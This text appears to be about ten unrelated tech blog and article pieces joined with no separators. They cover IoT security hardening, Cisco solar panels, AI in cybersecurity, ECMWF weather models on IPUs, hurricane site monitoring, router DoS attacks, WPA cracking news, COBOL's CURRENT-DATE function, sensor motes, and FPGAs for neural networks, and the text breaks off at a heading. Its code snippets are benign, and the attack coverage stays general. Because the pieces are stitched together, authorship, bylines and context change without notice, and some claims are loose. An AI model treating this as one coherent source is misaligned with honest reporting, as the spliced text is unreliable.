IoT is now pervasive and often represents a security weak link in enterprises. It’s far past time for organizations to account for IoT as part of their core endpoint security and edge security strategies.
Read on to learn about the top IoT security vulnerabilities, as well as best practices for hardening your IoT environment and reducing risk.
The Expanding IoT Threat Landscape
The Internet of Things (IoT) refers to the growing network of physical devices, vehicles, and home appliances always connected to the internet. These devices are collecting and sharing data, which is creating new opportunities for businesses and consumers alike. IoT is also powering edge computing networks, allowing delivery of data closer to where it is needed. This has implications for everything from self-driving cars to remote monitoring of operational technology (OT).
However, IoT and IIoT (industrial IoT) continue to pose massive security risks. Over the years, we’ve seen botnets (Mirai, Meris, etc.) comprised of inadequately secured IoT endpoints leveraged by attackers to perpetrate attacks so devastating that the world shuddered. We’ve also seen IoT devices embedded in sensitive industrial control systems compromised, putting actual lives at risk. Further, we’ve all heard tales of the creepy IoT-embedded dolls and other kids’ toys attackers have exploited to eavesdrop and invade privacy.
An increase in IoT, coupled with adoption of 5G, means IoT risk can be expected to increase in the coming years. 5G offers faster internet speeds and more reliability than ever before. However, 5G also comes with its own set of security risks to consider. One of the benefits of 5G is how it will enable more devices to be connected to the internet. Cyber criminals will have more opportunities to target devices, with the potential to create IoT botnets at far greater scale than ever seen before.
Top IoT Security Risks & Vulnerabilities
Now, let's look at some of the top IoT security vulnerabilities and how to harden your devices to prevent or mitigate them.
1. Unsecure Communications
One of the biggest risks associated with IoT is unsecure communications. Data transmissions between devices are susceptible to interception by third parties. This could allow threat actors to gain access to sensitive information, like user passwords or credit card numbers.
Security Controls: Leverage encryption to protect data in transit, whenever possible. If you are unable to encrypt data in transit, then try to isolate the network in which the device resides. Segmentation will help reduce the attack surface associated with the device. Organizations can use BeyondTrust’s Privileged Remote Access to consolidate access to these segmented networks in a secure and encrypted manner.
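As a simple illustration of the first control, the sketch below shows one way a gateway script could forward device telemetry over a TLS-encrypted channel using only Python's standard library. The collector host name, port, and payload fields are invented placeholders, not details from any BeyondTrust product.

```python
import json
import socket
import ssl

# Hypothetical telemetry collector endpoint; substitute your own host and port.
COLLECTOR_HOST = "telemetry.example.internal"
COLLECTOR_PORT = 8883

def send_reading(reading: dict) -> None:
    """Send one telemetry reading over a TLS-wrapped TCP connection."""
    context = ssl.create_default_context()  # verifies the collector's certificate
    with socket.create_connection((COLLECTOR_HOST, COLLECTOR_PORT)) as raw_sock:
        with context.wrap_socket(raw_sock, server_hostname=COLLECTOR_HOST) as tls_sock:
            tls_sock.sendall(json.dumps(reading).encode("utf-8"))

send_reading({"device_id": "sensor-042", "temperature_c": 21.7})
```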
2. Lack of IoT Security Updates
Once a device is released, it's up to the manufacturer to provide updates to address new security risks. However, many IoT / IIoT manufacturers do not release timely updates. Many manufacturers stop releasing updates altogether after a certain point. This leaves IoT devices vulnerable to attack from known security flaws.
Security Controls: To protect against this, businesses should only use devices from manufacturers who have a good track record of releasing timely updates. To offset this risk, it is important your vulnerability management system is capable of scanning IoT devices, so be sure to add them to your list of devices that are scanned. If you are unable to automate device patching, then attempt to fingerprint the devices as best you can. If there are no facilities enabled for you to install the patch, then at least you will know the potential vulnerabilities associated with the device. Then, you can take other mitigating actions to protect it.
3. Insufficient Authentication and Password Hygiene
Insufficient authentication hygiene means the device lacks adequate measures to verify users are who they claim to be. This could allow external attackers, as well as insider threat actors, to access IoT endpoints and systems that should be off-limits.
Security Controls: To protect against this threat, businesses should use strong authentication methods, like two-factor authentication or biometrics. In addition, drive access to IoT devices through a secure centralized infrastructure access solution like Privileged Remote Access. Also implement a method for:
a) discovering new IoT devices as they are added to your network, and
b) rotating the passwords associated with the accounts on the device.
Almost all devices have one or more privileged accounts that are part of the operating system. You can use a solution like BeyondTrust Password Safe to discover, onboard, and systematically manage these passwords. But since IoT devices usually have very lightweight operating systems, it's not possible to install an agent on the device to enforce security policies for accounts. So, you need to take other steps, like network segmentation and good password hygiene, to protect your IoT devices.
Best Practices for Hardening Your IoT Security
IoT continues to revolutionize how businesses operate and how consumers live their lives. It is a key part of the digital transformation wave on which so many companies are now riding. However, many organizations have still not adequately considered how to protect IoT as part of their overall cybersecurity planning.
This blog has highlighted some of the top IoT vulnerabilities as well as steps you can take to protect against them. By taking these precautions, you can help ensure your business is safe from the primary attack vectors.
Tal Guest, Senior Director of Product Management
Tal Guest is a Director of Product Management with over 20 years of industry experience. He directs a group of product managers, responsible for expanding privileged access management core capabilities in the areas of remote access and the service desk. Tal also helps establish long-term business strategies based on current/future market conditions and problems faced in the privileged access management area of cybersecurity.
Did you know that every hour the sun beams onto Earth more than enough energy to satisfy global energy needs for an entire year? Or that solar energy produces little to no greenhouse gasses? Clearly, solar power has the potential to reduce our reliance on other forms of energy, but how do we harness it?
Cisco is taking up the challenge in a number of ways:
1. We recently installed a 264-kilowatt roof-mounted solar photovoltaic (PV) system at our data center in Richardson, Texas. (Solar PV systems convert sunlight into electricity and can be used to power just about anything that uses electricity, from homes and businesses to cars and, of course, IT equipment!) This particular system will produce approximately 370,000 kilowatt hours annually, equivalent to the annual electricity use of 30 U.S. homes.
The system uses 1,078 solar panels that cover over 35,000 square feet of roof space — if laid end to end, they would stretch more than a mile! Check out this great time-lapse video of the entire installation:
2. Cisco also has two other 100-kilowatt solar PV systems installed at our data centers in Allen, Texas and Research Triangle Park, North Carolina. Starting in 2014, we will expand the existing system in Texas by an additional 339 kilowatts and install our largest solar system to date in Bangalore, India: a 940-kilowatt roof-mounted system covering 7 of our campus buildings.
Both of these projects are expected to be completed by July 2014, which will quadruple our company-wide onsite solar capacity to more than 1.7 megawatts, equal to the annual electricity use of approximately 206 U.S. homes.
Cisco recently set a series of new corporate energy and sustainability goals, and to achieve them, we will be implementing many energy efficiency and renewable energy projects between now and our 2017 goal year.
These solar PV projects are just the beginning, so stay tuned to hear more details about the rest of our projects in the near future!
Artificial intelligence (AI) is an immensely helpful tool for businesses and consumers alike. By processing data quickly and predicting analytics, AI can do everything from automating systems to protecting information.
In fact, keeping data secure is a significant part of what AI does in the modern world, though some hackers use technology for their own means.
The more we use artificial intelligence for protection, the more likely we’re able to combat high tech hackers. Here are just a few ways AI is securing our data.
Many hackers use a passive approach where they infiltrate systems to steal information without upsetting operations. These passive attacks can take months or even years to notice, if they are found at all. With AI, businesses can detect a cyberattack in advance or as soon as the hacker enters the system.
The volume of cyber threats is massive, especially since many hackers can automate the job. Unfortunately, these attacks are too much for humans to fight against alone. AI, however, is the best multitasker there is, able to find malicious threats instantly and alert humans or lock the attacker out.
Part of the detection process is to predict activity before it can happen. The New York Police Department made one of the earliest implementations of predictive technology in 1995. Its software, CompStat, combines data analysis with management philosophy and organizational tools. This predictive policing technique soon spread to other police stations across the United States.
Being on high alert at all times is difficult, even for AI and other forms of automated software. By predicting threats, systems can create specific defenses before an attack takes place. With this technique, the system runs with as much efficiency as possible without sacrificing security, especially since there are measures in place at all times.
While detecting a threat entering a system is fantastic, the goal is to make sure they can’t enter at all. Companies can build up walls of defense in many ways, one of those being camouflaging data completely. When information is moving from one source to another, it’s particularly susceptible to attacks and theft. Therefore, businesses need encryption along the way.
Encryption is merely changing the data to something that seems meaningless, like a code, which the system then decrypts on the other side.
Meanwhile, any hacker viewing the information will see random bits of text with no apparent meaning. Programs like iManage, which works with law firms and corporate legal departments, implement encryption as the first line of defense.
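As a toy illustration of that round trip (not how iManage or any other product actually implements encryption), the snippet below uses the Python cryptography library's Fernet recipe; the sample message is invented.

```python
from cryptography.fernet import Fernet

key = Fernet.generate_key()      # secret key shared by sender and receiver
cipher = Fernet(key)

token = cipher.encrypt(b"draft acquisition terms for client file 1138")
print(token)                     # random-looking bytes with no apparent meaning

print(cipher.decrypt(token))     # the original message, recovered on the other side
```

Anyone intercepting the token without the key sees only meaningless ciphertext, which is exactly the point.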
Passwords are the baseline of cybersecurity. While they’re so common that many hackers can bypass them easily, going without one is asking for someone to steal your data. Luckily, applying AI into the mix can make passwords more secure.
Before, a password was a word or phrase. In the modern era, words don’t cut it. Instead, companies use movements, patterns and biometrics to unlock information. Biometrics refers to using something unique to one’s body to open something, like retinal scans and fingerprints.
Apple’s iPhone X, for instance, uses a feature called Face ID, which scans your facial features with infrared sensors and turns that information into a password.
One thing better than having an incredibly good password is to have a lot of them. However, the multi-factor aspect changes how these codes work. Sometimes, being in a different location will require a user to enter a unique password. Paired up with the AI’s detection system, the characters can even change.
By allowing itself to be dynamic and working in real-time, access can modify itself in the event of an attack. Multi-factor doesn’t just create multiple walls of security but is also smart about who it lets in.
This system learns about the people entering the network, building patterns of their behavior and habits to cross-reference with malicious activity and determine their access privileges.
AI technology can think for itself, more or less. It can detect patterns, find faults and even execute plans to fix issues. In the realm of cybersecurity, this system creates a whole new layer of protection.
With the addition of artificial intelligence, the entire field of cybersecurity has changed forever and continues to evolve at a rapid pace. The more advances we reach, the more the field will change. A decade from now, we may not even recognize security features from when the internet first came about.
As the climate crisis intensifies, extreme weather events such as storm surges, heatwaves, hurricanes and wildfires are becoming more and more frequent. While plans to cut emissions by 2030 were recently laid out by world leaders at the COP26 summit, adequate preparation for extreme weather phenomena is growing in importance globally.
The science of numerical weather forecasting plays a vital role in this preparation. By predicting future weather events based on current climate data, organisations like the European Centre for Medium-Range Weather Forecasting (ECMWF) are working to alert authorities of upcoming extreme weather events earlier and with greater accuracy so interventions can be made to protect property and infrastructure, and potentially to save lives.
Today, the ECMWF is using AI alongside traditional HPC algorithms to run their large-scale simulations faster than ever before. Their team has developed and published a series of deep learning models investigating the use of AI in numerical weather forecasting. The ECMWF is particularly interested in enhancing the accuracy of their weather prediction models by improving the computational efficiency of their models in order to increase model resolution.
50x Faster Weather Predictions with IPUs
We took one of ECMWF’s publicly available forecasting models – a Multi-Layer Perceptron (MLP) – and accelerated it on Graphcore IPU-POD systems with dramatic results. The IPU-POD system was shown to train the ECMWF’s predictive MLP model 5x faster than a leading GPU and a massive 50 times faster than ECMWF’s existing simulation methods running on a CPU.
In their paper examining machine learning in weather forecasting, the ECMWF showed that their machine learning-based emulators performed 10 times faster on GPU hardware compared to their existing scheme on a CPU; by comparison, the IPU is a massive 50 times faster than those same CPU-based simulation methods.
The speed-up with the IPU system was achieved without any optimisation or changes to the MLP model or its parameters, and with only a few modifications to the code. The model trains well, showing low values for the loss and Root Mean Square Error (RMSE) on both the training and validation datasets after just a few epochs, demonstrating the high accuracy of the model’s predictions. To learn more about how IPUs accelerated the ECMWF’s MLP model, watch our code tutorial video.
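The published ECMWF code is the authoritative reference; purely as a hedged sketch of what training a small MLP emulator and tracking RMSE can look like, here is a PyTorch example on synthetic data. The layer sizes, learning rate, and input and output dimensions are arbitrary assumptions rather than ECMWF's actual configuration.

```python
import torch
from torch import nn

# Synthetic stand-ins for atmospheric-column inputs and the emulated outputs.
x = torch.randn(4096, 60)
y = torch.randn(4096, 30)

model = nn.Sequential(
    nn.Linear(60, 128), nn.ReLU(),
    nn.Linear(128, 128), nn.ReLU(),
    nn.Linear(128, 30),
)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
loss_fn = nn.MSELoss()

for epoch in range(5):
    optimizer.zero_grad()
    loss = loss_fn(model(x), y)   # mean squared error over the batch
    loss.backward()
    optimizer.step()
    print(f"epoch {epoch}: RMSE = {loss.sqrt().item():.4f}")
```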
The project was supported by ECMWF and Atos' AI4SIM team members, Alexis Giorkallos and Christophe Bovalo.
Leveraging IPU Hardware at the Convergence of HPC and AI
Beyond weather forecasting, IPU hardware has also been shown to accelerate many other scientific research applications where both HPC and AI are used. From protein folding and computational fluid dynamics to cosmology and high-energy physics, leading research institutions have found they can accelerate their workloads, pursue new directions of research and achieve higher accuracy results with IPU systems.
Cedric Bourrasset, Head of the High Performance AI Business Unit at Atos, a Graphcore partner, sees great potential for IPUs in this space: “The use of AI in traditional HPC applications is one of the most exciting developments in computing today and Graphcore’s IPU is showing just how transformative that new approach can be.
“Graphcore plays a central role in Atos’ Think AI solution, helping customers take advantage of the many benefits that AI is bringing to HPC – whether that’s delivering faster and more accurate simulations, improving cost efficiency, or opening up new areas of research and commercial applications. The possibilities are vast and they’re growing every day – driven in large part by the innovative work that is being done on the IPU.”
As hurricane season approaches, are we ever really prepared? The National Oceanic and Atmospheric Administration predicts a 40% chance of a near-normal hurricane season in 2019 and a 30% chance of an above-normal season. Already, Louisiana has felt the effects.
The difficulties faced by companies with large geographic footprints and many remote unmanned sites are multiplied by the onslaught of hurricane season. Even relatively nearby operations become effectively "remote" when a heavy storm strikes. Also, hurricane damage can cover a broad swath of a company's territory, taking down not one but dozens of important remote equipment sites.
As we've learned over the course of increasingly more intense and frequent storms in past decades: while hurricanes may be over in a day or a week, their effects can linger for years. For telecom, utilities, railroads, and large industrial companies to plan and organize their response and recovery efforts in the short-term, they must develop and implement a robust hurricane monitoring system for remotely managing equipment and assets.
Hurricane monitoring systems for companies help inform recovery not by tracking the storm as it develops and approaches, but by providing a real-time map of equipment concerns and damage. This allows companies to keep a growing record of affected assets and damage to equipment sites. Information provided by equipment monitoring systems can tell company managers whether sites are slightly, moderately, or severely affected, or not at all.
Knowing this allows management to marshal their responses over the days, weeks, and months which follow landfall.
By comparing damage reports to system function maps, resources can be applied as needed at the most essential sites. If certain sites need to come back online immediately to restore function, these can be prioritized.
While this method is hardly new - go see what's broken, then plan to fix it - it does improve on earlier disaster mitigation strategies by reducing legwork and consequent costly delays. Without a system capable of monitoring unmanned sites remotely, companies would need to send trained employees to each site. This would include every site affected by the storm. And, it can be a very time-consuming process for several reasons.
First, while companies employ many trained technicians, they don't usually employ enough to staff every site (and that would be wasteful even if it was possible). If each company site is potentially affected, then a small number of technicians must make a large number of diagnostic visits. That needs to happen before anyone can start planning to fix anything.
Even though the storm has blown over by the time this "recovery" stage arrives, the damage it causes is likely to linger, blocking roads with fallen trees or washing them entirely off the sides of hills. Remember, distance is measured in time: a site that's ten miles away is ten minutes away on the open highway. It's half a day or more away if that highway is impassable.
Also, local employees will likely have family and friends in the area who need help, and may not be able to fully devote themselves to their work immediately. Employees' homes may also have been affected. As a result, companies may face significant difficulty in even diagnosing the damage the storm does to their property. As downtime costs money, this is a problem which becomes relentlessly more expensive.
With a robust remote monitoring system in place before a hurricane strikes, this diagnostic phase can be shortened. Remote Terminal Units (RTUs) are monitoring tools designed to report on conditions in unmanned locations. On sunny days, RTUs track a range of inputs customized to equipment tolerances, including temperature, humidity, wind speed, vibration, inches of water on the floor, and even generator fuel levels and other info gleaned from local IoT connections.
When an input approaches a level dangerous to equipment, the RTU sends an alert to technicians. If there are more than ten sites (and RTUs) in a network, field data from RTUs are displayed by a central master station.
Then, company management can view a comprehensive, real-time map of remote site conditions across the network. This lets management know of issues to correct without the need to send diagnostic technicians.
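A minimal sketch of that threshold-alerting idea is shown below, with invented input names and limits rather than the behavior of any specific RTU product.

```python
# Hypothetical per-input alarm thresholds for one remote equipment site.
THRESHOLDS = {
    "temperature_c": 45.0,       # alarm above this temperature
    "wind_speed_mph": 75.0,      # alarm above this wind speed
    "floor_water_in": 1.0,       # alarm above this much standing water
    "generator_fuel_pct": 20.0,  # alarm below this fuel level
}

def evaluate_site(site_id, readings):
    """Return alert messages for any reading that crosses its threshold."""
    alerts = []
    if readings["temperature_c"] > THRESHOLDS["temperature_c"]:
        alerts.append(f"{site_id}: high temperature {readings['temperature_c']} C")
    if readings["wind_speed_mph"] > THRESHOLDS["wind_speed_mph"]:
        alerts.append(f"{site_id}: high wind {readings['wind_speed_mph']} mph")
    if readings["floor_water_in"] > THRESHOLDS["floor_water_in"]:
        alerts.append(f"{site_id}: {readings['floor_water_in']} in of water on the floor")
    if readings["generator_fuel_pct"] < THRESHOLDS["generator_fuel_pct"]:
        alerts.append(f"{site_id}: generator fuel low at {readings['generator_fuel_pct']}%")
    return alerts

print(evaluate_site("site-17", {
    "temperature_c": 48.2,
    "wind_speed_mph": 91.0,
    "floor_water_in": 0.0,
    "generator_fuel_pct": 64.0,
}))
```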
When the ocean is in an uproar, RTUs keep reporting all the same information. Inputs on humidity, wind speed, and water levels become increasingly important. They are primary indicators of storm intensity and damage potential.
By collecting information from RTUs as a storm moves (or sits) over a company's geographic footprint, management will have an up-to-the-minute map of which sites are the most affected by the storm. When the storm dies down eventually, and it's safe to go back to work, then local technicians can be dispatched intelligently to assess the worst damage and start repairing what they can.
Local resources are likely to be overwhelmed by the scale of the damage a hurricane can cause. While the storm is progressing and in the immediate aftermath, company managers can be drawing up resource orders for employees and emergency contractors hired from other regions.
The real-time information provided by RTUs can help itemize damage early, helping management order the right amount of private (and sometimes national) resources to effectively and quickly respond to a crisis. Trucks can be rolling before the rain stops falling.
Telecom, utility, railroad, and industrial companies with large physical footprints do well by having RTUs at their unmanned sites even when the weather is fine. But when a disaster strikes, these already-useful hurricane monitoring system tools become extremely valuable. Remote monitoring provides real-time information about storm conditions where workers can't go. This allows company managers to get their networks or plants back up and running as soon as possible when the skies clear up, helping their customers return to normalcy.
DPS Telecom's remote monitoring solutions have helped companies plan disaster recovery efforts numerous times in the past decades. Our solutions are effective for normal operations and emergent circumstances. To learn more, get a quote today!
We all yearn for the more innocent time when the acronym DOS stood for your Disk Operating System, or even the Dept. of State for the better traveled. Today, however, it is a term that brings a chill to many technologists — Denial of Service. Initially, this was largely the realm of minor miscreants, who wanted no more than to target specific Web sites they thought would be cool to disrupt. But now a greater chill has begun to set in as a result of the selective targeting of routers.
Of late, the hacker community has taken to discussing ‘router protocol attacks’ in listservs, Usenet, and at conferences. Attacks against routers can have serious consequences for the Internet at large. Routers can be used for direct attacks against the routing protocols that interconnect the networks comprising the Internet, therefore causing serious service availability issues on a large scale. By dealing with such threats to their infrastructures, network managers will be protecting both their own interests and the interests of all networks to which they connect.
Crackers perceive router attacks as attractive for several reasons. Unlike computer systems, routers are generally buried within the infrastructure of an enterprise. Often, they are comparatively less protected by monitors and security policies than computers, providing a safer harbor within which the miscreant can operate. Many routers are poorly deployed, with the vendor-supplied default password the only wall between network security and ruination. Documents circulate supplying advice on procedures for breaking into a router and changing its configuration. Once compromised, the router can be used as a platform for scanning activity, ‘spoofing’ connections (disguising the origin of packets), and as a launch point for DoS attacks.
According to Laurie Vickers, a Senior Analyst at Cahners In-Stat Group, “A router is the gateway to a company. They have been the target of hackers and Script Kiddies for quite some time now, but what seems to be occurring is that the hackers are growing more sophisticated. They’re finding that the front door is locked, so they go around back and see that the patio door has been left open.”
Vickers asserts that router attacks can prove devastating to networks as managers try to determine “Which box will it be? Routers often integrate VPN services and/or firewalls, and these make them even juicier targets.” Once the router is compromised, the entire network can be up for grabs.
A further area for concern is what Carnegie Mellon’s Computer Emergency Response Team (CERT) Coordination Center refers to as the shrinkage of ‘Time-To-Exploit’. In other words, once a vulnerability in a system or device has been discovered, it takes attackers less time to exploit it, perhaps less time than it takes to author or deploy a security patch.
Further, don’t look for a particular group or individual to target your systems. Tools used to initiate DoS attacks and to propagate the ‘attack toolkits’ (the collection of instructions used for the attack) are increasingly automated. Scripts are frequently used for scanning, exploitation, and deployment.
What To Do?
Traditional security solutions are often outwitted by DoS attacks. Firewalls and Intrusion Detection Systems (IDS) are designed to detect attacks against individual Web servers or hosts — not the network infrastructure.
To combat this, several companies have worked on solutions specific to DoS attacks. Arbor Networks helped pioneer this field with their product, PeakFlow DoS, which deploys data collectors which analyze traffic flow (before it reaches the enterprise’s routers or firewalls) and searches for anomalies. Such intelligence is forwarded to a controller, which in turn attempts to trace the attack back to its source. In the meantime, the controller sends filter recommendations to the network managers, which can be deployed to attempt to divert the attack. Prices for enterprise deployment begin at $130,000, and there are plans to provide similar protection as a monthly-billed service for smaller networks.
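As a toy illustration of flow-anomaly detection in general (not Arbor's actual algorithm), a collector might flag traffic that deviates sharply from a recent baseline; the sample numbers are invented.

```python
from statistics import mean, stdev

def is_anomalous(history_pps, current_pps, sigma=4.0):
    """Flag the current packets-per-second rate if it sits far above the recent baseline."""
    baseline = mean(history_pps)
    spread = stdev(history_pps)
    return current_pps > baseline + sigma * spread

history = [1200, 1350, 1100, 1280, 1330, 1250, 1190, 1310]
print(is_anomalous(history, 9800))   # True: looks like flood traffic
print(is_anomalous(history, 1400))   # False: within normal variation
```

Real products correlate many such signals across routers before recommending filters, but the core idea of comparing live traffic against a learned baseline is the same.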
Tripwire‘s Tripwire for Routers takes a more modest approach of monitoring a Cisco router’s startup and configuration files, and notifying you of any changes from that device’s trusted state. (The router needs to be running IOS 11.3, 12.0, or 12.1.) It is currently only available for Solaris 7 or 8 workstations; a Windows 2000 version is forthcoming. Pricing is scaled based on how many routers will be covered, and an evaluation version of the software is available for download.
On the low end, some common sense is your first, and perhaps your best defense. Make sure you’re aware of every connection from the outside world that has access to your router. Be sure that you have changed the default security configurations, especially the password. We have more information in Protect Your Network From a DoS Attack.
These new trends in DoS attacks demonstrate that threats to availability of service — be they against a network or the Internet at large — are likely to become more sophisticated as time goes on. Aside from the impact on your network, lack of diligence on router and infrastructure security could make you an unwitting conveyor of DoS attacks. Stay aware of developments, and hold yourself accountable for your network’s security on all fronts, and you should be able to avoid disaster.
It’s been known for years that the Wired Equivalent Privacy or WEP protocol is easily broken, and that to be secure, wireless networks should use the more powerful protocol called Wi-Fi Protected Access, or WPA.
Now security experts say they’ve proven that WPA can be breached just as easily. A pair of researchers in Japan said that they developed a way to break WPA encryption in about one minute — and will show how at a conference there next month.
WPA’s viability has been in doubt since late 2008, when security researchers Martin Beck and Erik Tews demonstrated the ability to break the Temporal Key Integrity Protocol (TKIP) that provides WPA security within 15 minutes.
Now, researchers Toshihiro Ohigashi of Hiroshima University and Masakatu Morii of Kobe University said they’ve improved on that. The pair has already discussed their findings in a paper presented at the Joint Workshop on Information Security held in Taiwan earlier this month and will discuss it again at a Sept. 25 event in Hiroshima. Read the rest at InternetNews.com.
The CURRENT-DATE function returns a 21-character alphanumeric value that represents the calendar date, time of day, and local time differential factor provided by the system on which the function is evaluated. The type of this function is alphanumeric.
|Character Positions|Contents|
|---|---|
|1-4|Four numeric digits of the year in the Gregorian calendar.|
|5-6|Two numeric digits of the month of the year, in the range 01 through 12.|
|7-8|Two numeric digits of the day of the month, in the range 01 through 31.|
|9-10|Two numeric digits of the hours past midnight, in the range 00 through 23.|
|11-12|Two numeric digits of the minutes past the hour, in the range 00 through 59.|
|13-14|Two numeric digits of the seconds past the minute, in the range 00 through 59.|
|15-16|Two numeric digits of the hundredths of a second past a second, in the range 00 through 99. The value 00 is returned if the system on which the function is evaluated does not have the facility to provide the fractional part of a second.|
|17|The character '0'. This is reserved for future use.|
|18-19|The characters '00'. This is reserved for future use.|
|20-21|The characters '00'. This is reserved for future use.|
MOVE FUNCTION CURRENT-DATE (1:4) TO YEARDATE.
Every now and then a hand goes up. I’m continually amazed at how little the IT community knows about these little yet powerful devices. They have been written-up in scientific and computing journals, and yet few IP professionals are aware of their existence.
I had lunch almost two years ago with a VP of IT from one of the large financial services firms. He not only knew about motes but was fascinated by their power potential. He was the exception rather than the rule.
Motes are very small, battery powered computers that allow discrete electronic sensing devices to communicate wirelessly with not only a centralized system, but with each other as well. They share a common, distributed operating system called TinyOS as well as a distributed data base called (you guessed it) TinyDB.
Star Trek fans may remember The Borg—telepathic humanoids that knew each other’s thoughts and acted as individuals yet with a group consciousness. Think of motes as computing’s version of The Borg.
Motes were originally created by researchers at the University of California at Berkley and Intel. TinyOS and TinyDB are products of the open source community. Development on both the hardware and software fronts is now being pursued by more than 100 groups around the world today who are using motes in a long list of applications.
For example, suppose that you run a chemical manufacturing plant and you need to implement a system that not only detects chemical spills the moment they happen, but also identify the location of the spill and direct workers to a safe location or safe exit from the plant.
You could combine electronic chemical sensing devices with mote technology. Now you have devices that can be deployed quickly and precisely where they need to be because they communicate wirelessly and are battery powered, and can determine the location and direction of movement of a chemical spill because they all communicate with each other. In fact, they form an invisible, sensory mesh.
Here’s what I think is maybe the coolest thing about motes: This incredibly powerful technology is within easy reach of just about anyone with some money to spare and a genuine interest in learning how these little critters work.
You can buy them right now, online, for less than $25.00 each. You could attach motion sensors to them and create a motion detection mesh that could be deployed in a warehouse, or a forest, or even your own house or apartment. On the other hand, a governmental group (large metropolitan city, for example) could arm thousands of them with radiation sensors as defense against a “dirty bomb” attack.
The list of potential applications is as long as the list of things that can be sensed electronically—light, sound, and vibration come to mind immediately.
So now that you know what motes are, give free reign to your imagination. Just Google and you’ll find them. Then ask yourself: What could a small army of motes do for me?
John Webster is senior analyst and founder of Data Mobility Group. He has held the positions of director of Computing Research with Yankee Group’s Management Strategies Planning Service, and Senior Analyst with International Data Corp. He is also the co-author of a book entitled “Inescapable Data – Harnessing the Power of Convergence” (Prentice Hall, 2005).
Continued exponential growth of digital data of images, videos, and speech from sources such as social media and the internet-of-things is driving the need for analytics to make that data understandable and actionable.
Data analytics often rely on machine learning (ML) algorithms. Among ML algorithms, deep convolutional neural networks (DNNs) offer state-of-the-art accuracies for important image classification tasks and are becoming widely adopted.
At the recent International Symposium on Field Programmable Gate Arrays (ISFPGA), Dr. Eriko Nurvitadhi from Intel Accelerator Architecture Lab (AAL), presented research on Can FPGAs beat GPUs in Accelerating Next-Generation Deep Neural Networks. Their research evaluates emerging DNN algorithms on two generations of Intel FPGAs (Intel Arria10 and Intel Stratix 10) against the latest highest performance NVIDIA Titan X Pascal* Graphics Processing Unit (GPU).
Dr. Randy Huang, FPGA Architect, Intel Programmable Solutions Group, and one of the co-authors, states, “Deep learning is the most exciting field in AI because we have seen the greatest advancement and the most applications driven by deep learning. While AI and DNN research favors using GPUs, we found that there is a perfect fit between the application domain and Intel’s next generation FPGA architecture. We looked at upcoming FPGA technology advances, the rapid pace of innovation in DNN algorithms, and considered whether future high-performance FPGAs will outperform GPUs for next-generation DNNs. Our research found that FPGA performs very well in DNN research and can be applicable in research areas such as AI, big data or machine learning which requires analyzing large amounts of data. The tested Intel Stratix 10 FPGA outperforms the GPU when using pruned or compact data types versus full 32 bit floating point data (FP32). In addition to performance, FPGAs are powerful because they are adaptable and make it easy to implement changes by reusing an existing chip which lets a team go from an idea to prototype in six months—versus 18 months to build an ASIC.”
Neural network machine learning used in the test
Neural networks can be formulated as graphs of neurons interconnected by weighted edges. Each neuron and edge is associated with an activation value and weight, respectively. The graph is structured as layers of neurons. An example is shown in Figure 1.
Figure 1. Overview of deep neural networks. Courtesy of Intel.
The neural network computation goes through each layer in the network. For a given layer, each neuron’s value is calculated by multiplying and accumulating the previous layer’s neuron values and edge weights. The computation heavily relies on multiply-accumulate operations. The DNN computation consists of forward and backward passes. The forward pass takes a sample at the input layer, goes through all hidden layers, and produces a prediction at the output layer. For inference, only the forward pass is needed to obtain a prediction for a given sample. For training, the prediction error from the forward pass is then fed back during the backward pass to update the network weights – this is called the back-propagation algorithm. Training iteratively does forward and backward passes to refine network weights until the desired accuracy is achieved.
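As a minimal, hedged illustration of that multiply-accumulate structure (not the code used in the study), one fully connected layer can be written as a matrix product followed by an activation:

```python
import numpy as np

def dense_layer(activations, weights, bias):
    """One layer: multiply-accumulate the previous layer's values, then apply a ReLU activation."""
    return np.maximum(0.0, activations @ weights + bias)

rng = np.random.default_rng(0)
x = rng.standard_normal((1, 256))            # previous layer's neuron values
w = rng.standard_normal((256, 128)) * 0.05   # edge weights
b = np.zeros(128)

hidden = dense_layer(x, w, b)                # forward pass through one hidden layer
print(hidden.shape)                          # (1, 128)
```

Stacking such layers gives the forward pass; training repeats forward and backward passes to update the weights, as described above.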
Changes making FPGA a viable alternative
Hardware: While FPGAs provide superior energy efficiency (Performance/Watt) compared to high-end GPUs, they are not known for offering top peak floating-point performance. FPGA technology is advancing rapidly. The upcoming Intel Stratix 10 FPGA offers more than 5,000 hardened floating-point units (DSPs), over 28MB of on-chip RAMs (M20Ks), integration with high-bandwidth memories (up to 4x250GB/s/stack or 1TB/s), and improved frequency from the new HyperFlex technology. Intel FPGAs offer a comprehensive software ecosystem that ranges from low level Hardware Description languages to higher level software development environments with OpenCL, C, and C++. Intel will further align the FPGA with Intel’s machine learning ecosystem and traditional frameworks such as Caffe, which is offered today, and with others coming shortly, leveraging the MKL-DNN library. The Intel Stratix 10, based on 14nm Intel technology, has a peak of 9.2 TFLOP/s in FP32 throughput. In comparison, the latest Titan X Pascal GPU offers 11TFLOPs in FP32 throughput.
Emerging DNN Algorithms: Deeper networks have improved accuracy, but greatly increase the number of parameters and model sizes. This increases the computational, memory bandwidth, and storage demands. As such, the trends have shifted towards more efficient DNNs. An emerging trend is adoption of compact low precision data types, much less than 32-bits. 16-bit and 8-bit data types are becoming the new norm, as they are supported by DNN software frameworks (e.g., TensorFlow). Moreover, researchers have shown continued accuracy improvements for extremely low precision 2-bit ternary and 1-bit binary DNNs, where values are constrained to (0,+1,-1) or (+1,-1), respectively. Dr. Nurvitadhi co-authored a recent work that shows, for the first time, that a ternary DNN can achieve state-of-the-art (i.e., ResNet) accuracy for the well-known ImageNet dataset. Another emerging trend introduces sparsity (the presence of zeros) in DNN neurons and weights by techniques such as pruning, ReLU, and ternarization, which can lead to DNNs with ~50% to ~90% zeros. Since it is unnecessary to compute on such zero values, performance improvements can be achieved if the hardware that executes such sparse DNNs can skip zero computations efficiently.
The emerging low precision and sparse DNN algorithms offer orders of magnitude algorithmic efficiency improvement over the traditional dense FP32 DNNs, but they introduce irregular parallelism and custom data types which are difficult for GPUs to handle. In contrast, FPGAs are designed for extreme customizability and shine when running irregular parallelism and custom data types. Such trends make future FPGAs a viable platform for running DNN, AI and ML applications. “FPGA-specific Machine Learning algorithms have more head room,” states Huang. Figure 2 illustrates FPGA’s extreme customizability (2A), enabling efficient implementations of emerging DNNs (2B).
Figure 2. FPGAs are great for emerging DNNs.
Study hardware and methodology
